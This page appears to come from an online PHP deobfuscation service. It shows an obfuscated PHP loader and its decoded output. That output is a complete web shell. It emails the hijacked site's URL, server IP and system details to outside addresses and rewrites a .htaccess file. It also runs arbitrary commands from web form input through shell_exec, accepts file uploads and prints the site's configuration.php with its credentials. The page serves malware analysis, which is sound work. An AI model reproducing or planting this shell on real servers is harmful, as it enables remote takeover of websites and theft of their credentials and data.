Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $x = 'xUrpRuJVFP+8RjX/UNtYSKBngNFk1wtYCAEZueTQ8ZhX5XVVWK5aOgJN/u/7upMg6Og4W0EtX1X6v..

Decoded Output download

error_reporting(0);
if (!isset($_SESSION['bajak']))	{
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "Target ditemukan 
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
$uname = ".php_uname().";
mail("[email protected]", "$body","Hasil Bajakan http://$web$inj
$security
$uname
IP Server = $serper
 IP Injector= $injektor");
mail("[email protected]", "$body","Hasil Bajakan http://$web$inj
$security
$uname
IP Server = $serper
 IP Injector= $injektor");
$_SESSION['bajak'] = 1;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/cache/xml.php";
rename($source, $desti);
}
$file = 'PEZpbGVzICpwaHAqPg0KICAgIE9yZGVyIERlbnksQWxsb3cNCiAgICBEZW55IGZyb20gYWxsDQo8L0ZpbGVzPg0KPEZpbGVzICoudm9iPg0KICAgIE9yZGVyIERlbnksQWxsb3cNCiAgICBEZW55IGZyb20gYWxsDQo8L0ZpbGVzPg0KPEZpbGVzICpwSHAqPg0KICAgIE9yZGVyIERlbnksQWxsb3cNCiAgICBEZW55IGZyb20gYWxsDQo8L0ZpbGVzPg0KPEZpbGVzICpodG0qPg0KICAgIE9yZGVyIERlbnksQWxsb3cNCiAgICBEZW55IGZyb20gYWxsDQo8L0ZpbGVzPg0KPEZpbGVzICpsaWJzLnBocCo+DQogICAgT3JkZXIgQWxsb3csRGVueQ0KICAgIEFsbG93IGZyb20gYWxsDQo8L0ZpbGVzPg0KPEZpbGVzIDQwNC5waHA+DQogICAgT3JkZXIgQWxsb3csRGVueQ0KICAgIEFsbG93IGZyb20gYWxsDQo8L0ZpbGVzPg0KPEZpbGVzICptbGlicyo+DQogICAgT3JkZXIgRGVueSxBbGxvdw0KICAgIERlbnkgZnJvbSBhbGwNCjwvRmlsZXM+DQo8RmlsZXMgKi5saWJzKj4NCiAgICBPcmRlciBEZW55LEFsbG93DQogICAgRGVueSBmcm9tIGFsbA0KPC9GaWxlcz4NCjxGaWxlcyBpbmRleCo+DQogICAgT3JkZXIgQWxsb3csRGVueQ0KICAgIEFsbG93IGZyb20gYWxsDQo8L0ZpbGVzPg==';
$pathx = $_SERVER['DOCUMENT_ROOT'].'/'.'cache/.htaccess';
if(file_exists($pathx)) @unlink($pathx);
$content2 = base64_decode($file);
$txt2 = fopen($pathx,"a+");
fwrite($txt2, $content2);
fclose($txt2);
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF BArNEr";}
else {$security= "SAFE_MODE : ON BArNEr";}
echo "<title>BArNEr</title><br>";
$dataku = "POWERED BY FULLMAGIC COMMUNITY";
$dataku2 = "ready fresh tools SHELLS FTP CPANEL RDP MAILER";
$dataku3 = "Contact Admin YM : KUNCUNG525";
echo "<font size=2 color=blue><b>".$dataku."</b><br>";
echo "<font size=2 color=red><b>".$dataku2."</b><br>";
echo "<font size=2 color=blue><b>".$dataku3."</b><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
if(isset($_GET['URL'])){
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="sh"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." Succes! "; }
}
}
if(isset($_POST['command'])){
$sh = $_POST['sh'];
echo "<pre><font size=3 color=#000000>".shell_exec($sh)."</font></pre>";
}
elseif(isset($_GET['shx'])){
$comd = $_GET['sh'];
echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>";
}
else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
}

if(isset($_GET['db'])){
$conf = file_get_contents("../configuration.php");
echo $conf;
}

Did this file decode correctly?

Original Code

<?php
$x = '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';$s='YkCpi04uVXicc/N3BEXu03RBCAiLAhfxE94X0qq4XzoXW09l/iMV19e/ogO4X0kSK226kQx7zXEfEcGUIJiBgxy+VsIdZ/lhjTQRnRLGh6+HTfYcVGbNNLQH1PUjhtjcJyXMyIxuxKNfwqGFSon9VWrognnEMBjdd5DT/H0C/AVh2KG0v3cogZsTEEFxM+p4ARN8n2sJpIan3mN0fuLB0Lc9zVE16LPCiwLnfuaMUlqTuKkzse0rDG+/isk8dvkrQWfuxHWvTdEmRiG9h5aNS8LnwYylP2InbVwy5Q8YGbYWhiWmrQjEUyY0rLNSeXCHSsK7lCE8b0pFLJxhrZGQMClfn/3H4kvLCDtFmcQcELrPJN8aGbHW9q+kNCTSauATWSJOHe+WqDE6MUjOkP2hCGZ8NRaD6bawJi/UJMa8C9SiJmOaFfD5TlneMB5DPN3QCr0fiXYPRgaazUY46HcxfQ3hffQgd/HhB8FBkn/xjWCJyCUXbokPgqTr+QFMzqOtNI+K4ge9PLSIesPCTgz4DrBRz4szqcBS8VfjTOkJoTVY9YM5prAgIfx0AzjQKyYsb/lYqBJZ80K2Jr0A/LzbmfqjcO6IYkN8JxPzLF6TTxhi+QIn0mQUdbx9iEKqXOq2EOTw/wI=';










eval(gzinflate(str_rot13(base64_decode($x))));
?>

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1

Variables

$s YkCpi04uVXicc/N3BEXu03RBCAiLAhfxE94X0qq4XzoXW09l/iMV19e/ogO4..
$x xUrpRuJVFP+8RjX/UNtYSKBngNFk1wtYCAEZueTQ8ZhX5XVVWK5aOgJN/u/7..

Stats

MD5 e5e3ffd69c80e8cc793a46672a2ab713
Eval Count 1
Decode Time 109 ms